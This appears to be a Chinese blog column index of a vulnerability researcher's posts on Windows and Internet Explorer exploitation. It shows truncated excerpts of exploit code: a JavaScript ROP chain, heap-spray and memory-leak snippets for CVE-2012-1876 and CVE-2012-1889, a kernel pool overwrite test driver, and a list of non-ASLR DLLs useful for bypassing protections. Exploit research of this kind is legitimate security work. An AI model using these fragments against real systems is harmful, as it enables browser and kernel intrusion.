
漏洞利用
instruder
I'am a Vulnerability hunter!
alert("instruder")
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
KERNEL POOL LIST ENTRY OVERWRITE ATTACK
KERNEL POOL LISTENTRY OVERWRITE ATTACK LIST_ENTRY OVERWRITE 原理图 测试代码: Sys: VOID Nopagepool_ListEntry_Overwrite(ULONGcbin,ULONG cout,UCHAR * InputBuffer) { PVOIDpatdbuffer=NULL,p原创 2012-02-29 21:04:27 · 957 阅读 · 0 评论 -
MSVCRT:ROP - CN 修改ROP检测标志
function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn kkkkk += unescape("\uf519\u77be")////pop ecx,retn kkkkk += unescape("\u9ef8\u1009原创 2014-04-08 23:21:34 · 2485 阅读 · 0 评论 -
Well-known DEP-violating thunks
这几天调试发现一个奇怪的现象,一个在数据区段执行的指令,在开启了系统dep时 竟然还可以继续执行,换成其他指令就不可以,而且执行时这个内存属性仍旧是不可 执行属性。同时按理指令是一条一条执行,但是这个指令的执行是跳跃了,瞬间差点毁了 多年的指令执行三观。 debug win7+system dep open Breakpoint 0 hit eax=2e81e原创 2013-04-10 19:24:57 · 3677 阅读 · 0 评论 -
当前多数杀软主防存在的缺陷
见 链接 http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1原创 2012-12-03 23:18:22 · 1047 阅读 · 0 评论 -
cve-2012-1876 win7_ie8_leak_shellcode code
alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0原创 2012-08-08 12:55:06 · 3264 阅读 · 0 评论 -
cve2012-1876 leak mshtml base address and leak shellcode base address
leak mshtml base address leak shellcode base address 其中leak shellcode base 思路是联合 http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003原创 2012-08-06 21:21:58 · 1405 阅读 · 0 评论 -
没有ASLR的几个DLL
DpoFeedb.dll 指纹识别 现在买的笔记本都有 MSCOMCTL.OCX 需要用户点一次允许 之后就不需要了 VBE7INTL.DLL 未找到加载方式 迅雷 mcvcr71.dll java6 mcvcr71.dll comct232.ocx 需要用户点一次允许 之后就不需要了 com原创 2012-06-22 15:49:13 · 1357 阅读 · 0 评论 -
cve2012-1889 ie8 rop
采用inking 大牛的方法 function exploit() { obj = document.getElementById('oo').object; var src = unescape("%u0c0c%u0c0c"); while (src.length < 0x1002) src += src; src = "\\\\xxx" + src; src = src.subs原创 2012-06-19 00:49:30 · 1285 阅读 · 0 评论 -
ms10_046_shortcut_icon_dllloader 这个其实很好用
原创 2014-04-08 23:34:21 · 3838 阅读 · 1 评论